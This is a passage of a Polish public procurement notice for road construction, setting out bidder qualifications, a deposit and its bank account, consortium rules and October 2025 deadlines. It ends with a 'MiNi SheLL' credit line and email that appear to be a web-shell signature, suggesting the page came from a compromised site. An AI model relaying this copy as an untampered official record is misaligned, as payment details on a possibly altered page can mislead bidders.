stawia wymagań w tym zakresie <br/>2)	uprawnień do wykonywania określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie stawia wymagań w tym zakresie <br/>3)	sytuacji ekonomicznej lub finansowej, tj.:<br/> Zamawiający nie stawia wymagań w tym zakresie<br/> 4) zdolności technicznej lub zawodowej, tj.:<br/> Zamawiający uzna warunek za spełniony, jeżeli:<br/>a) Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie przynajmniej 2 zadania ( realizowane na podstawie dwóch odrębnych umów) odpowiadające swoim rodzajem przedmiotowi zamówienia tj. polegające na budowie/przebudowie/rozbudowie drogi o wartości nie mniejszej niż 300 000,00 zł brutto każda, z podaniem rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane oraz załączy dowody potwierdzające, że te roboty budowlane zostały wykonane z należytą starannością i prawidłowo ukończone;<br/>b) Wykonawca wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy:<br/>- kierownikiem budowy posiadającym co najmniej uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń zgodnie z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz będącą członkiem właściwej terytorialnie izby inżynierów<br/>- kierownikiem robót sanitarnych posiadającym co najmniej uprawnienia do kierowania robotami budowlanymi w specjalności sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń, zgodnie z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz będącą członkiem właściwej terytorialnie izby inżynierów<br/>dotyczy warunku określonego w ust. 2 pkt. 4 lit. a SWZ:<br/>Warunek udziału w postępowaniu dotyczący zdolności technicznej i zawodowej, w zakresie doświadczenia zawodowego, musi być spełniony:<br/>1) przez Wykonawcę samodzielnie;<br/>2) przez co najmniej jeden podmiot udostępniający wiedzę i doświadczenie (podwykonawcę) samodzielnie; <br/>3) w przypadku Wykonawców występujących wspólnie - samodzielnie przez co najmniej jednego z Wykonawców występujących wspólnie.<br/>4) Nie jest dopuszczalne łączenie (sumowanie) wyżej wymaganego doświadczenia różnych podmiotów zaangażowanych w realizację zamówienia<br/> UWAGA: <br/>a) w przypadku gdy Wykonawca realizował zamówienie jako jeden z grupy Wykonawców (konsorcjum) może powoływać się jedynie na swoje własne, realne doświadczenie, które zdobył realizując daną część zamówienia, która została mu przypisana w ramach grupy, tzn. może wykazywać się doświadczeniem jedynie w zakresie, jaki rzeczywiście dany podmiot wykonywał. Doświadczenia nie uzyskuje się poprzez sam udział w konsorcjum, lecz poprzez konkretne czynności realizowane w jego ramach;<br/>b) jeżeli zakres robót przedstawionych w dokumencie złożonym na potwierdzenie, że roboty budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie robót budowlanych podać wartość robót potwierdzających spełnienie warunku udziału w postępowaniu;<br/>c) Wykonawca jest obowiązany wykazać spełnienie warunków udziału w postępowaniu określonych w Ogłoszeniu o zamówieniu i SWZ, w sposób i za pomocą dowodów określonych w ustawie Pzp, w Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415 ze zm.).<br/>d) Podmiot udostępniający zasób na podstawie art. 118 ust. 1 ustawy Pzp jest zobowiązany uczestniczyć w realizacji zamówienia w zakresie, w jakim udostępnił wykonawcy.<br/>dotyczy warunku określonego w ust. 2 pkt. 4 lit. b SWZ:<br/>Warunek udziału w postępowaniu dotyczący zdolności technicznej i zawodowej, w zakresie doświadczenia zawodowego oraz zdolności technicznej, musi być spełniony:<br/>1) przez Wykonawcę samodzielnie lub;<br/>2) przez Wykonawcę i co najmniej jeden podmiot udostępniający zasoby łącznie lub; <br/>3) w przypadku Wykonawców występujących wspólnie składających ofertę – łącznie przez wszystkich Wykonawców występujących wspólnie.<br/>UWAGA:<br/>a) za uprawnienia budowlane odpowiadające wyżej określonym uznane zostaną uprawnienia, które wydane zostały na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu – EFTA (strony umowy o Europejskim Obszarze <br/>Gospodarczym) z zastrzeżeniem, art. 12 a oraz innych przepisów ustawy Prawo budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220 ze zm.); <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy prawo zamówień publicznych w zakresie podstaw wykluczenia wskazanych przez Zamawiającego – Załącznik nr 9 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualny na dzień złożenia wykaz wykonanych robót budowlanych, o których mowa w rozdziale XII lit. B ust. 2 pkt 4 lit. a wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, daty wykonania, miejsca wykonania i podmiotów, na rzecz których zamówienia te zostały wykonane, z załączeniem dowodów określających czy usługi te zostały wykonane należycie. Dowodami, o których powyżej, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. Wzór stanowi Załącznik Nr 4 do SWZ;<br/>2) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, o których mowa w rozdziale XII ust. 2 pkt 4 lit. b wraz z informacjami na temat ich kwalifikacji zawodowych oraz uprawnień, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór wykazu osób stanowi załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca składa wraz z ofertą Formularz – Materiały i urządzenia równoważne stanowiący Załącznik nr 10 do SWZ wyłącznie w przypadku, kiedy zamierza zastosować urządzenia/materiały inne wobec tych zastosowanych w opisie przedmiotu zamówienia (dokumentacji projektowej, warunkach technicznych oraz innych dokumentach zamówienia). Dokument ten traktowany będzie jako przedmiotowy środek dowodowy, który zgodnie z art. 107 ust. 2 ustawy pzp podlega uzupełnieniu (dokument nie został złożony lub jest niekompletny) na wezwanie Zamawiającego. Brak złożenia dokumentu wraz z Ofertą oznaczał będzie, że Wykonawca zastosuje urządzenia i materiały wskazane w opisie przedmiotu zamówienia (dokumentacji projektowej, warunkach technicznych oraz innych dokumentach zamówienia). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Formularz – Materiały i urządzenia równoważne stanowiący Załącznik nr 10 do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> ) Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości:<br/>5 000,00 zł (słownie: pięć tysięcy złotych )<br/>2)	Wadium może być wniesione w formach przewidzianych w art. 45 ust. 6 ustawy Prawo zamówień publicznych tj. w:<br/>a)	Pieniądzu na rachunek bankowy Zamawiającego – 91 8015 0004 1000 7315 2010 0003<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>3)	Wadium musi być wniesione przed upływem terminu składania ofert.<br/>4)	Uwaga! W przypadku wnoszenia wadium w formie pieniądza, Zamawiający uzna, iż wadium zostało wniesione w terminie, jeżeli kwota wadium zostanie uznana przez rachunek Zamawiającego najpóźniej do ostatecznego terminu składania ofert.<br/>5)	Wadium musi obejmować okres związania ofertą.<br/>6)	Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i zobowiązania Zamawiającego i Wykonawcy odnośnie ww. ustalenia będą podlegały - odpowiednio - nowym terminom.<br/>7)	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w 2 b-d, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej<br/>8)	Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje odrzuceniem oferty Wykonawcy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. spółki cywilne lub konsorcja (tj. dwóch lub więcej Wykonawców) w ramach oferty wspólnej w rozumieniu art. 58 ustawy pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2)	Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>•	Postepowania o zamówienie publiczne którego dotyczy<br/>•	wszystkich Wykonawców ubiegających się wspólnie udzielenie zamówienia <br/> wymienionych z nazwy z określeniem adresu siedziby,<br/>•	ustanowionego Pełnomocnika oraz zakresu jego umocowania.<br/>3)	Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, przy czym nie jest wymagany podpis pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.<br/>4)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5)	W przypadku, o którym mowa w pkt. 4) wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6) Oświadczenie, o którym mowa w pkt. XIII.A.2 SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu, w zakresie, w jakim każdy z wykonawców wskazuje spełnienie warunków udziału w postępowaniu.<br/>7) Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Na podstawie art. 455 ustawy pzp, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej Umowy w zakresie:<br/>1)	terminu wykonania Przedmiotu Umowy wraz ze skutkami wprowadzenia takiej zmiany;<br/>2)	zmiany zakresu Przedmiotu Umowy wraz ze skutkami wprowadzenia takiej zmiany;<br/>3)	sposobu wykonywania Przedmiotu Umowy wraz ze skutkami wprowadzenia takiej zmiany;<br/>4)	wynagrodzenia za wykonanie Przedmiotu Umowy wraz ze skutkami wprowadzenia takiej zmiany.<br/>Szczegółowy rodzaj i zakres zmian został określony w załączniku nr 6 do SWZ - Wzór umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kampinos.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-06 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com